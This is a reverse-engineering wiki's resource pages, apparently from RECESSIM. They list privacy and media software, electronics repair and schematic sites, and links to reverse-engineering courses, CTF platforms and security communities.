:::*[https://omemo.im/ OMEMO.IM] is a free, secure XMPP-based chat client available for Android and Windows that utilizes the OMEMO (Multi-End Message and Object) end-to-end encryption protocol.
:::*[https://xmpp.org/extensions/xep-0384.html XEP-0384: OMEMO Encryption] defines an end-to-end encryption protocol for XMPP messaging that uses double-ratchet and key-exchange techniques to securely encrypt one-to-one and group chats across multiple devices.
*[https://getsession.org/ Session] - Session is an end-to-end encrypted messenger that minimises sensitive metadata, designed and built for people who want absolute privacy and freedom from any form of surveillance.
*[https://github.com/briar Briar] - is a messaging app designed for activists, journalists, and anyone else who needs a safe, easy and robust way to communicate. Unlike traditional messaging apps, Briar doesn't rely on a central server - messages are synchronized directly between the users' devices.
*[https://matrix.org/ Matrix] - is an open network for secure, decentralised communication.
*[https://discord.com/ Discord] - is a voice, video and text communication service used by over a hundred million people to hang out and talk with their friends and communities.
::Discord client advice
:::*1. Stop using the installed electron PC based version. Use the web version.
:::*2. Android stock client is spoiled with rubbish code slowing down your SoC and sending loads of analytics, use [https://github.com/Aliucord/Aliucord Aliucord] instead (but carefully read the readme.md, ToS issue).

=====File Archiver Utilities=====

*[https://www.7-zip.org/ 7-Zip] - is a free and open source file archiver.

*[https://github.com/M2Team/NanaZip NanaZip] - is a free and open source file archiver intended for the modern Windows experience.

*[https://peazip.github.io/ PeaZip] - is a free and open source file archiver, similar to WinRar, WinZip, and 7-Zip.

=====Disk Encryption Software=====

*[https://guardianproject.info/archive/luks/ Linux Unified Key Setup (LUKS)] - The Linux Unified Key Setup (LUKS) is a disk encryption specification created by Clemens Fruhwirth in 2004 and originally intended for Linux. LUKS implements a platform-independent standard on-disk format for use in various tools

*[https://www.veracrypt.fr/code/VeraCrypt/ VaraCrypt] - VeraCrypt is free open-source disk encryption software for Windows, Mac OS X and Linux. Support for on-the-fly encryption [[Wikipedia:Disk_encryption|(OTFE)]].

=====Image Manipulation Tools=====

*[https://www.gimp.org/ Gimp] - is the official website of the GNU Image Manipulation Program (GIMP). GIMP is a cross-platform image editor available for GNU/Linux, macOS, Windows and more operating systems. It is free software, you can change its source code and distribute your changes.

*[https://www.getpaint.net/ Paint.net] - is image and photo editing software for PCs that run Windows. It features an intuitive and innovative user interface with support for layers, unlimited undo, special effects, and a wide variety of useful and powerful tools. An active and growing online community provides friendly help, tutorials, and plugins.

=====Video Editing Software / 3D Creation / Dec, Enc, Transcode, etc / Media Players=====

*[https://www.blackmagicdesign.com/products/davinciresolve DaVinci Resolve] - is the world’s only solution that combines editing, color correction, visual effects, motion graphics and audio post production all in one software tool! Its elegant, modern interface is fast to learn and easy for new users, yet powerful for professionals.

*[https://shotcut.org/ Shotcut] - is a free, Open Source, cross-platform video editor for Windows, Mac and Linux. Major features include support for a wide range of formats; no import required meaning native timeline editing; Blackmagic Design support for input and preview monitoring; and resolution support to 4k.

*[https://www.openshot.org/nl/ OpenShot] - is a free, Open Source video editor for Linux, Mac, and Windows. We designed OpenShot to be an easy to use, quick to learn, and surprisingly powerful video editor. Easily cut, slice, and edit any video or film.

*[https://www.blender.org/ Blender] - is the free and open source 3D creation suite. It supports the entirety of the 3D pipeline—modeling, rigging, animation, simulation, rendering, compositing and motion tracking, even video editing and game creation.

*[https://ffmpeg.org/ FFMPEG (Command line interface to convert different formats)] - FFmpeg is the leading multimedia framework, able to decode, encode, transcode, mux, demux, stream, filter and play pretty much anything that humans and machines have created. It supports the most obscure ancient formats up to the cutting edge.

*[https://handbrake.fr/features.php HandBrake] - is an Open Source video transcoder available for Linux, Mac, and Windows. Everyone can use HandBrake to make videos for free. HandBrake is a post-production tool. Its primary purpose is to convert videos from supported source formats to MP4 or MKV format.

*[https://www.videolan.org/ VLC Player] - VLC Media Player (also known as VLC) is a free, open source multimedia player developed by VideoLAN Organization. It is one of the oldest (released for the first time in February 2001) free, portable, cross-platform multimedia player. You can use it to play all popular multimedia files and also DVDs, CDs, VCDs and other streaming protocols.

=====Video Recording and Live Streaming=====

*[https://obsproject.com/ OBS (Open Broadcaster Software)] - is free and Open Source software for video recording and live streaming.

*[https://streamlabs.com/ StreamLabs] - is free live streaming and recording software for Twitch, YouTube, and more for Windows or Mac.

====Search engine (self-hosted & open-source)====
*[https://github.com/searxng/searxng SearXNG] - is a free and open-source metasearch engine that prioritizes user privacy. It works by aggregating results from various search engines, such as Google, Bing, and DuckDuckGo, without tracking or profiling users. Essentially, it acts as a privacy-respecting proxy for your searches.

*[https://github.com/neon-mmd/websurfx websurfx] - is a free and open-source metasearch engine written in Rust, designed to provide a fast, secure, and privacy-respecting alternative to search engines like SearX. It aggregates results from other search engines without displaying ads, focusing on speed, security, and user privacy.

*[https://github.com/mwmbl/mwmbl Mwmbl] - is a non-profit, open source search engine where the community determines the rankings. We aim to be a replacement for commercial search engines such as Google and Bing.

*[https://github.com/yacy/yacy_search_server YaCy] - is a free, open-source, peer-to-peer (P2P) search engine that operates without a central authority. It differs from traditional search engines by allowing users to create their own local or global indexes and share them with other users, creating a decentralized network.

====Social Network / Fediverse (self-hosted & open-source)====

*[https://joinmastodon.org/ Mastodon] - is a free and open-source software for running self-hosted social networking services. It has microblogging features similar to Twitter, which are offered by a large number of independently run nodes, known as instances or servers, each with its own code of conduct, terms of service, privacy policy, privacy options, and content moderation policies. [https://github.com/mastodon/mastodon Github repo].

*[https://github.com/pixelfed/pixelfed PixelFed] - is a decentralized, open-source social media platform focused on photo and video sharing, designed as an alternative to Instagram. It utilizes the ActivityPub protocol, allowing users to interact with accounts on other Pixelfed servers as if they were on the same platform.

*[https://github.com/movim/movim Movim] - is a federated blogging and chat platform that acts as a web frontend for the XMPP protocol.

*[https://github.com/emilebosch/awesome-fediverse Big fediverse list] - is a curated list of more decentralized social networks.

====Privacy-focused Software Directory====

*[https://prism-break.org/ prism-break.org] - is a website that provides a curated list of free and open-source software (FOSS) alternatives to proprietary, surveillance-prone services. It aims to help users opt out of global data surveillance programs—like PRISM, XKeyscore, and Tempora—by promoting privacy-respecting technology for operating systems, browsers, and communication tools.

==Education==

:[[:Literature|See the literature wiki page for all the resources.]]

Literature

2026-04-04T21:09:06Z

Polymorphic7: add GPU repair forum

Books, Journals, Magazines, Datasheets and all other literature related to reverse engineering is welcome here. The book pictured is the bound edition of a portion of the PDF's available in the PoC||GTFO section.[[File:POCorGTFO.jpg|thumb|<nowiki>Bound edition of PoC||GTFO, Proof of Concept OR Get The Fuck Out.</nowiki>]]

===Books and Magazines===
::[[PoCorGTFO|PoC||GTFO]] - International Journal of Proof-of-Concept or Get The Fuck Out (Mirror)

::[https://wiki.recessim.com/w/images/0/01/HackingTheXbox_Free.pdf Hacking the Xbox] - An Introduction to Reverse Engineering by Andrew "bunnie" Huang

::[https://nostarch.com/hardwarehackerpaperback The Hardware Hacker] - Manufacturing and Open Hardware by Andrew "bunnie" Huang

::[https://www.lehmanns.de/shop/mathematik-informatik/56052761-9781789619133-practical-hardware-pentesting Practical Hardware Pentesting] - A guide to attacking embedded systems and protecting them against the most common hardware attacks (ISBN 978-1-78961-913-3).

::[https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks Awesome-Cybersecurity-Handbooks] - Big collection of documents for cybersecurity & reverse engineering.

===Datasheets, boardviews, schematics, manuals===

====Generic (various fields)====

'''The curralated list below provides a wide range of useful websites offering resources regarding repair of wide range of electronic devices.'''

::[https://www.eserviceinfo.com/ e-service info] - Here you can find free datasheets, service manuals, schema, schematic diagrams and software downloads, service menu and mode information, code calculators for many brands of equipment. Search in all service docs that are OCR'd.

::[https://www.docin.com/ DOCin] - Chinese datasheet and other documents website

::[https://www.espec.ws/ espec.ws] [https://www.google.com/search?q=file%3Apdf%20site%3Ahttps%3A%2F%2Fmonitor.espec.ws%2Ffiles 1e100 Dork]- Russian site for people specializing in the repair and development of electronic equipment or who want to learn how to do it. Has a archive with datasheets and schematics.

::[https://www.eserviceinfo.com/browse.php eServiceInfo] - Service manuals, schematics, documentation, programs, electronics, hobby ....

::[https://elektrotanya.com/keres Elektrotanya] - This site helps you to save the Earth from electronic waste! Schemetics, Service manuals, etc.

::[https://servlib.com/ ServLib] - The largest library of service manuals and schematics for Sony, Panasonic, Sharp, JBL. Repair information for electronics technicians. [https://github.com/AriZoneVibes/ServLibScrapper/ Scraper for ServLib].

::[https://www.freeservicemanuals.info FreeServiceManuals] - Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.

::[http://www.nostatech.nl/ Nostatech] - Nostatech's Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.

::[https://www.alldatasheet.com/ Alldatasheets] - Chinese datasheet database.

::[https://alltransistors.com/ All Transistors] - All Transistors Datasheet. Cross Reference Search. Transistor Database.

::[https://remont-aud.net/ Remont-aud] - Russian website offering a collection of schematics, datasheets and firmware dumps.

::[http://rom.by/ rom.by] - Russian website has verious rom dumps, datasheet and schematics

::[https://whycan.com whycan.com] - A Chinese embedded ARM development community offering a collection of schematics, SDKs for different platforms, datasheets, and firmware dumps.

::[https://www.s-manuals.com/ S-manuals.com] - Schematics, Service Manuals, ..

::[https://www.schematicsunlimited.com/ schematicsunlimited.com] - Download FREE diagrams, schematics, service manuals, operating manuals and other useful information for a variety of products.

====Portable computers, smartphones, videocards, printers, TVs====

'''The curralated list below provides a wide range of useful websites offering resources regarding repair of mostly smartphones, printers and laptops / notebooks.'''

::[https://vlab.su/ Vlab.su] - Russian virtual repair community. Virtual repair laboratory. Any problem can be solved together.

::[https://www.macdat.net/ macdat.net] - is a hobbyist-run website offering a detailed database of vintage laptop specs and Macintosh repair resources, including capacitor guides and service schematics.

::[https://www.electronica-pt.com/ Electrónica PT] - Portuguese community for basic and advanced electronics, electronic repair support center.

::[https://thetechstall.com/ The Tech Stall] - Download all the necessary tools for laptop and desktop motherboard diagnostics and fixes at no cost for free to reduce e-waste and spare the environment.

::[https://www.cyberforum.ru/notebook-circuit/ Cyberforum] - A Russian forum for programmers and system administrators also offering some schematics and boardview for repair.

::[https://zremcom.ru/scheme/scheme-laptops Zremcom] - A Russian website for repair, setup of servers, computers. Service manuals and diagrams for computers, laptops and power supplies.

::[https://www.alisaler.com/ AliSaler] - Website offering EC & Bios firmwares / bins, datasheets, boardviews, schematics, ic equivalent information, and programmer software for laptops.

::[https://www.alifixit.com/ AliFixit] - We believe in reviving technology and minimizing electronic waste. As our field is computers and laptops, we are here trying to provide as much stuff as possible for free to make our contribution.

::[https://www.indiafix.in/p/schematic-and-boardview-collection.html IndiaFix] - Free laptop schematic & boardviews downloads. Desktop bios dumps, and free repair tips.

::[https://www.apple-schematic.se/ Apple Schematic] - Free schematic and boardview (BRD) for Apple Macbooks and other Apple devices.

::[https://novoselovvlad.ru/ Novoselovvlad.ru] - Blog of the workshop of Vladislav Novoselov (offers schematics, bios dumps, and various other helpful tools).

::[http://printer1.blogspot.com/ printer1] - Collection of service manuals for printers and laptops.

::[https://www.tvservice.org/ TV Service] - is a Russian website offering datasheets and schematics for TV repair.

::[https://www.smarttvmanuals.net/ Smart Tv Manuals & Circuit Board Diagrams] - is a website offering datasheets and schematics for Smart TV repair.

::[https://www.informaticanapoli.it/manuali-di-servizio/ informaticanapoli] - Italian website that offers service manuals and schematics for various laptop brands.

::[https://www.gadget-manual.com/nvidia-geforce/ Gadget-Manual] - Graphic card manuals boardviews and datasheets.

::[https://sector.biz.ua/docs/schematic_diagrams_msi_motherboards/schematic_diagrams_msi_motherboards.phtml Sector] - Russian website offering schemetic diagrams, datasheets and boardviews (Asrock, Asus, ECS, Gigabyte, Acer, IBM/Lenovo).

::[https://schematic-x.blogspot.com/ Schematic-x] - Free laptops & desktop schematic diagrams and BIOS downloads.

::[https://www.s-manuals.com/notebook S-manuals.com] - Notebooks, Schematics, Service Manuals, ..

=====Laptop or smartphone Boardview / Schematic / Firmware [Groups]=====
::[https://t.me/schematicslaptop schematicslaptop] - Laptop schematics.

::[https://t.me/biosarchive biosarchive] - The largest channel of archived bios (firmwares) of laptops.

::[https://t.me/SMART_PHONE_SCHEMATICS SMART_PHONE_SCHEMATICS] - Collection of smartphone schematics.

=====Software for opening Boardview files=====

::[[Software_Tools#Tools_for_opening_CAD_or_Boardview_files|Tools for opening CAD or Boardview files.]]

====GPU Repair====
::[https://levirepair.eu/infusions/forum/viewthread.php?thread_id=10&pid=72#post_72 LeviRepair] is a specialized online forum and community focused on technical GPU repair, diagnostics, and component-level troubleshooting. It acts as a knowledge base for repairing graphics cards, covering topics like VRAM testing, bios flashing, and hardware repairs for NVIDIA and AMD cards.

====Retro PC Hardware====
::[https://theretroweb.com/ The Retro Web] - The Retro Web motherboard database, here you can find board photos, BIOS images, manuals and more!

::[https://soggi.org/ Soggi] - Retro hardware BIOS, firmware, drivers, manual, patches, tools, utilities, tech demos, other downloads and specifications available.

====Vintage Audio Equipment Schematics / Manuals====
::[https://hifigoteborg.se/pdf/ HiFiGoteborg] - LoudAndProud HiFi Goteborg. Schematic archive of old forgotten Hi-Fi from the golden days.

====Paid sources (various fields)====
Most of the websites provide free service manuals and boardviews, '''but some unfortunately don't or have been PAYWALLED (badcaps.net as of 2026). '''

::[https://www.badcaps.net/ Badcaps] - Badcaps Electronics Repair Forum & Schematic Search <--- Pay 2 download..

::[https://vinafix.com/ Vinafix] - Vinafix Electronics Repair Forum & Schematic Search <--- Pay 2 download..

----

===SMD Marking Codes Database===

'''Due to the small size of most SMD components, manufacturers are not able to write the full part number on the case. They use instead a marking code typically composed of a combination of 2 or 3 letters or digits.''' 
'''When repairing an unknown electronic board, it becomes so difficult to know what is the exact type of a given component. This database allows to quickly find the part number of a SMD component when you have only the marking code.''' 

::[https://www.pcbcart.com/article/content/How-to-Identify-SMD-Components.html PCBCart] - How to Identify SMD Components Explained.

::[https://smd.yooneed.one/ smd.yooneed.one] - A searchable database of electronics SMD components marking codes.

::[https://embedeo.org/smd_codes/ embedeo.org/smd_codes] - SMD marking codes of electronic components such as bipolar transistors (BJT), field effect transistors (FET, MOSFET, JFET), diodes, Zener diodes, Schottky ..

::[https://repaircompanion.com/ RepairCompanion] - Your companion for electronics tools, component identification, calculators, diagnostics and education.

::[https://www.sos.sk/pdf/SMD_Catalog.pdf SOS electronic, The SMD CODEBOOK] - It lists well over 3,400 device codes in alphabetical order, together with type numbers, device characteristics or equivalents and pinout information.

::[http://www.marsport.org.uk/smd/mainframe.htm The SMD Codebook (marsport)] - Online version to look up a SMD codes.

::[https://www.s-manuals.com/smd S-manuals.com] - SMD Markings, SMD codes, ..

===IC Equivlent Database===

'''This might be useful if you run into a problem were you don't have a exact matching replacement part. Now you can use the cross-reference search for an equivalent IC.'''

::[https://alltransistors.com/ All Transistors] - Datasheet. Cross Reference Search. Transistor Database.

::[https://octopart.com/ Octopart] - Lets you search for transistor datasheets but also allows you to filter by key specifications much like AllTransistors cross reference.

===Hardware pinouts (web-based)===

::[https://allpinouts.org/ allpinouts.org] - is a Web-based free content project to list cable and connectors pin-outs.

::[https://pinouts.ru/ pinouts.ru] - Handbook of hardware schemes, cables and connectors layouts pinouts.

----

===Find a image of the PCB without opening the device===
:# Modify the link below replace "example" without quotes with the product name and model you want to find
:# Visit the url and the results will show, if it does not show any results it has not been listed in the fccid database.
::<pre>https://www.google.com/search?tbm=isch&q=example+internal+site:fccid.io</pre>

::Note that there will be no results if the device does not have a wireless receiver or transmitter inside. Some have used a off-the-shelf (OTS) wireless radio to avoid having to do a new FCC certification. In that case it is useless material and time saving to first quickly image search the ID to check for this.
::[https://fccid.io/search.php FCCID.io search direct link]

====Electronic certification databases====
'''If the device is sold in the U.S. and complies with U.S. regulations, see below.''' 
An FCC ID is a unique identifier assigned to a device registered with the United States Federal Communications Commission. 
For legal sale of wireless devices in the US.
These databases can be of great use if you want to quickly know what kind of wireless communication hardware is used. 
Here you can most often find certifications, type approvals, specifications, instructions, internal/external pictures and sometimes even datasheets.

::* FCC.Report. Provides this easily searchable FCC ID database.
:::: [https://fcc.report/FCC-ID/ -> FCC.Report]
::* Device.report. Electronics device database of over 500,000 products with certifications, type approvals, specifications, instructions, and datasheets.
:::: [https://device.report/ -> Device.Report]

----

===Digital Education===
:Resources for reverse engineering closed-source software to identify bugs, debug, and conduct penetration testing.

====Reverse Engineering Guides====
:Tools are great, and sometimes free! Without knowing how to use them, they can be a big waste of time. Better to spend your time learning the basics, then apply your knowledge.

::[http://security.cs.rpi.edu/courses/hwre-spring2014/ CSCI 4974 / 6974 Hardware Reverse Engineering] - Good slide decks on reverse engineering hardware at all levels, IC to PCB.

::[https://github.com/mytechnotalent/Reverse-Engineering-Tutorial Reverse Engineering Tutorial] - A comprehensive reverse engineering tutorial covering x86, x64, 32-bit ARM & 64-bit ARM architectures.

=====Ghidra Documents=====
'''Class material linked from ghidra.re. Use arrow keys on keyboard to move through slides.'''
======Beginner======
::[https://ghidra.re/ghidra_docs/GhidraClass/Beginner/Introduction_to_Ghidra_Student_Guide.html Introduction to Ghidra Student Guide.]
======Intermediate======
::[https://ghidra.re/ghidra_docs/GhidraClass/Intermediate/Intermediate_Ghidra_Student_Guide.html Intermediate to Ghidra Student Guide.]
======Advanced (PDF)======
::[https://ghidra.re/ghidra_docs/GhidraClass/Advanced/improvingDisassemblyAndDecompilation.pdf Advanced (PDF).]
======Advanced Development======
::[https://ghidra.re/ghidra_docs/GhidraClass/AdvancedDevelopment/GhidraAdvancedDevelopment.html Advanced Development.]
======Debugger======
::[https://ghidra.re/ghidra_docs/GhidraClass/Debugger/README.html Debugger.]
======BSim======
::[https://ghidra.re/ghidra_docs/GhidraClass/BSim/README.html BSim.]

=====IDA Material=====

::[[File:Reverse Engineering Malware IDA & Olly Basics 5 parts by otw v1.pdf|thumb]] - A Reverse Engineering Malware introduction and bare basics IDA & Olly x86 (5 parts) by otw.

::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-1/ Using IDAPython to Make Your Life Easier: Part 1] - As a malware reverse engineer, I often find myself using IDA Pro in my day-to-day activities. It should come as no surprise, seeing as IDA Pro is the industry standard (although alternatives such as radare2 and Hopper are gaining traction). One of the more powerful features of IDA that I implore all reverse engineers to make use of is the Python addition, aptly named ‘IDAPython’, which exposes a large number of IDA API calls.

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-2/ Using IDAPython to Make Your Life Easier: Part 2]

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-3/ Using IDAPython to Make Your Life Easier: Part 3]

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-4/ Using IDAPython to Make Your Life Easier: Part 4]

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-5/ Using IDAPython to Make Your Life Easier: Part 5]

::[https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering Some publicly available Malware analysis and Reverse engineering] - is a curated list of awesome materials from the user Dump-GUY a former Forensic, Malware Analyst, Reverse Engineer. [https://www.youtube.com/c/DuMpGuYTrIcKsTeR Youtube channel].

=====x64dbg=====

::[https://help.x64dbg.com/en/latest/introduction/index.html x64dbg] - Introduction & documentation page.

=====Immunity Debugger=====

::[https://class.malware.re/stuff/nardella/basic-reverse-engineering-immunity-debugger-36982.pdf Basic Reverse Engineering with Immunity Debugger] - SANS Institute Information Security Reading Room. Basic Reverse Engineering x86 with Immunity Debugger.

=====Malware Reverse Engineering=====

::[https://tryhackme.com/room/basicmalwarere BasicMalwareRE] - this room aims towards helping everyone learn about the basics of "Malware Reverse Engineering".

::[https://gist.github.com/IdanBanani/5be0442ad390f89259b494098f450bfd Reversing / Malware Analysis / Assembly -resources] - is a large list of reversing materials and courses.

::[https://github.com/CyberSecurityUP/Awesome-Malware-and-Reverse-Engineering Malware and Reverse Engineering Complete Collection] - Awesome Malware and Reverse Engineering collection by Joas.

=====Anti Debugging Protection Techniques with Examples=====
======x86 (Win32)======

::[https://anti-debug.checkpoint.com/ cp<r> Anti-Debug Tricks] - By Check Point Research: CPR, x86 & x64.

::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 & x64.

::[https://www.codeproject.com/Articles/30815/An-Anti-Reverse-Engineering-Guide An-Anti-Reverse-Engineering-Guide] - By Joshua Tully hosted on CodeProject, Win32/x86 with examples.

::[https://www.openrce.org/reference_library/anti_reversing OpenRCE Anti Reversing Database] - Mostly if not all Win32/x86. The Anti Reverse Engineering Database provides the analysis and desription for a number of various anti debugging, disassembly and dumping tricks. This resource aims to help reverse engineers locate, identify and bypass such techniques.

::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.

::[[Media:Anti-reverse engineering techniques by Jozef Miljak.pdf]] - An experimental study on which anti-reverse engineering technique are the most effective to protect your software from reversers, Win32/x86.

::[https://forum.tuts4you.com/files/file/1218-anti-reverse-engineering-guide/ Anti-Reverse Engineering Guide By Teddy Rogers] - An individual reading this should have a solid understanding of ASM, how computers handle memory, the Win32 Debugging API, and at least some knowledge of Windows internals.

======x64 (Win64)======

::[https://anti-debug.checkpoint.com/ cp<r> Anti-Debug Tricks] - By Check Point Research: CPR, x86 & x64.

::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 & x64.

::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.

====Machine code or virtual machine bytecode reference====

=====Assembly reference / manuals=====

======x86======

::[http://ref.x86asm.net/ Reference x86] - Reference X86 Opcode and Instructions (the holy x86 assembly bible).

======x86 Training======
::[https://x86re.com/1.html Reverse Engineering for Noobs Part 1] - Brief introduction to RE, executables, compiling, 32-bit x86 syntax, and stack frames.

::[https://x86re.com/2.html Reverse Engineering for Noobs Part 2: Portable Executable Files] - Breakdown of Portable Executable image file headers and sections.

======x86 and amd64======

::[https://www.felixcloutier.com/x86/ x86 and amd64 instruction reference] - Derived from the December 2023 version of the Intel® 64 and IA-32 Architectures Software Developer's Manual.

=====Bytecode reference=====
======Java Virtual Machine (JVM)======

::[https://en.wikipedia.org/wiki/List_of_Java_bytecode_instructions Wikipedia] - List of Java bytecode instructions.

::[https://javaalmanac.io/bytecode/ The Java Version Almanac] - Java Bytecode, by Mnemonic.

======Dalvik opcodes (Android)======

::[http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html Pallergabor] - Dalvik opcodes documentation with examples.

::[https://github.com/user1342/Awesome-Android-Reverse-Engineering Awesome-Android-Reverse-Engineering] - A curated list of awesome Android Reverse Engineering training, resources, and tools.

======Common Language Runtime (CLR) .NET======

::[https://en.wikipedia.org/wiki/List_of_CIL_instructions Wikipedia] - List of CIL instructions.

::[https://github.com/stakx/ecma-335/blob/master/docs/TABLE_OF_CONTENTS.md ECMA-335 Documentation] - This Standard defines the Common Language Infrastructure (CLI).

====Reverse Engineering Challenges====

::[https://crackmes.one/ Crackmes.one] - is a simple place where you can download crackmes to improve your reverse engineering skills.

::[https://crackmy.app/ CrackMy.App] - is as place to share your crackmes, solve challenges, and climb the leaderboard in the ultimate reverse engineering community.

====Security Training Classes====

::[https://ost2.fyi/ OpenSecurityTraining2] - is a free, beta-stage online platform built on Open edX that offers in-depth cybersecurity and reverse-engineering courses like x86 assembly, kernel exploitation, and firmware analysis.

====Security CTF====
Capture the Flag (CTF) in computer security is an exercise in which participants attempt to find text strings, called "flags", which are secretly hidden in purposefully vulnerable programs or websites. 
Learn more about reverse engineering and cybersecurity start playing CTF's.

::[https://jaimelightfoot.com/blog/so-you-want-to-ctf-a-beginners-guide/ CTF Beginners Guide] - is intended to be a guide for beginners who have just started playing CTFs (or for people who have never played, but would like to).

::[https://ctflearn.com/ CTFlearn] - The most beginner-friendly way to get into hacking. Challenges Test your skills by hacking your way through hundreds of challenges.

::[https://ctf101.org/ CTF101] - a site documenting the basics of playing Capture the Flags. This guide was written and maintained by the OSIRIS Lab at New York University.

::[https://picoctf.org/ picoCTF] - is a free computer security education program with original content built on a capture-the-flag framework created by security and privacy experts.

::[https://microcorruption.com/ MicroCorruption] - is a online, embedded debugger that starts from scratch and introduces the very foundations of memory corruption. Great practice for learning the basics of binary exploitation.

::[https://echoctf.red/ echoctf.red] - A platform to develop, run and administer CTF competitions. The online echoCTF.RED platform user interfaces and codebase.

::[https://pwnable.kr/ Wargames Pwnable.kr] - is a non-commercial wargame site which provides various pwn challenges regarding system exploitation, including reverse engineering, web exploitation, and cryptography.

::[https://pwnable.tw/challenge/ Wargames Pwnable.tw] - is a wargame site for hackers to test and expand their binary exploiting skills. HOW-TO. Try to find out the vulnerabilities exists.

::[https://ctfsites.github.io/ More CTF sites] - A curated list of more CTF sites on Github.

====Embedded security Challenge (ESC)====

::[https://github.com/TrustworthyComputing/csaw_esc_2025 csaw_esc_2025] - CSAW 2025 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2024 csaw_esc_2024] - CSAW 2024 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2023 csaw_esc_2023] - CSAW 2023 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2022 csaw_esc_2022] - CSAW 2022 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2021 csaw_esc_2021] - CSAW 2021 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2019 csaw_esc_2019] - CSAW 2019 Embedded Security Challenge (Github repo).

====800 MHz AMPS Documentation====
::[https://wiki.recessim.com/w/images/8/86/Cellular_Telephone_Bible_With_SIDs.txt The Cellular Telephone Bible by Mike Larsen (1997)] Unlock codes and programming procedures of early 800 MHz analog AMPS cellular phones. This document also contains the system IDs (SID) of the 800 MHz analog service providers.

Other Sites

2026-04-04T18:19:59Z

Polymorphic7: iranian scene

This section is meant to highlight other sites of interest to the reverse engineer. Feel free to add to the list along with a brief description.
== Site Index ==

[https://www.exploitee.rs/index.php/Main_Page Exploitee.rs] - Wiki devoted to hacking Android, IoT and GoogleTV devices.

[https://xdaforums.com/ XDA Developers Forum] - Big Android community with developers, power users and enthusiasts.

[https://www.eevblog.com/forum/index.php EEVblog Electronics Community Forum] - is the world's biggest engineering blog. An off-the-cuff video blog for Electronics Engineers, hobbyists, hackers and makers.

[https://repair.wiki/w/3rd_Party_Repair_Channels Great list of 3rd Party Repair Channels] - List from repair.wiki.

[https://repair.wiki/w/Repair_Wiki Repair.wiki] - Great resources for repairing all kinds of electronics.

[https://deskthority.net/wiki/ Deskthority wiki] - is dedicated to mechanical keyboards, mice and other human interface devices. The main focus is everything regarding quality (mechanical) keyboards. In the nature of a wiki, the content will be frequently and constantly under construction.

[https://discord.gg/NWuBUxC All-Things Repair Discord (formerly "Rossmann Group's Official Discord")] - Big Repair community with developers, power users and enthusiasts.

[https://media.ccc.de/ Chaos Computer Club Media] - The Chaos Computer Club e. V. (CCC) is the largest European hacker association and has been a mediator in the field of technical and social developments for over thirty years.

[https://defcon.org/ Defcon] - DEF CON Groups are worldwide, local chapters of hackers, thinkers, makers and others.

[https://thehackernews.com/ TheHackersNews] - THN is the leading and go-to source for timely and relevant breaking news from the world of cybersecurity, as well as valuable insights into the latest threats and solutions.

[https://phishtank.org/ PhishTank] - if you "love" spam too this is your place to be. Out of the Net, into the Tank.

[https://www.hybrid-analysis.com/ Hybrid Analysis] - Submit malware for free analysis with Falcon Sandbox and Hybrid Analysis technology. Hybrid Analysis develops and licenses analysis tools to fight malware.

[https://www.virustotal.com/gui/home/upload VirusTotal] - was founded in 2004 as a free service that analyzes files and URLs for viruses, worms, trojans and other kinds of malicious content.

[https://attack.mitre.org/ MITRE ATT&CK®] - is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, in government, and in the cybersecurity product and service community.

[https://www.vx-underground.org/ vx-underground] - is the largest collection of malware source code, samples, and papers on the internet.

[https://secret.club/ Secret.club] - is a blog about reverse-engineering, hacking and breaking your software in every way imaginable.

[https://blog.malware.re/ malware.re blog] - Coleman Kane's blog about RE malware.

[https://owasp.org/ OWASP] - driven by volunteers, OWASP resources are accessible for everyone.

[https://webscene.ir/ Webscene.ir] is an Iranian web entity associated with web development or related technology services and reverse engineering.

[https://exetools.com/ ExeTools] - The tools of the trade in the RE scene.

[https://forum.exetools.com/ ExeTools Forums] - How to improve your cracking and programming skills.

[https://tuts4you.com/ Tuts 4 You] - is a non-commercial, independent community dedicated to the sharing of knowledge and information on reverse code engineering.

[https://recon.cx/ Recon] - REcon is a computer security conference with a focus on reverse engineering and advanced exploitation techniques. It is held annually in Montreal, Canada.

[https://www.offensivecon.org/ Offensive Security Conference] - OffensiveCon Berlin is a highly technical international security conference focused on offensive security only. The aim of OffensiveCon is to bring the hacker community together for high quality and deep technical talks, engaging and renowned technical trainings. The talks at OffensiveCon are focused on offensive IT security topics such as vulnerability discovery, advanced exploitation techniques and reverse engineering.

[https://ecqurity.com/ E-CQURITY (Short for ECQ)] - provides Advesary Simulation or Red Team service to help you truly test and validate the effectiveness of your entire security architecture.

[https://www.exploit-db.com/ Exploit-db] - The Exploit Database - Exploits, Shellcode, 0days, Remote Exploits, Local Exploits, Web Apps, Vulnerability Reports, Security Articles, Tutorials and more.

[http://infiltratecon.com/ Infiltrate] - is a deeply technical conference that focuses entirely on offensive security issues. Groundbreaking researchers demonstrate techniques that you cannot find elsewhere.

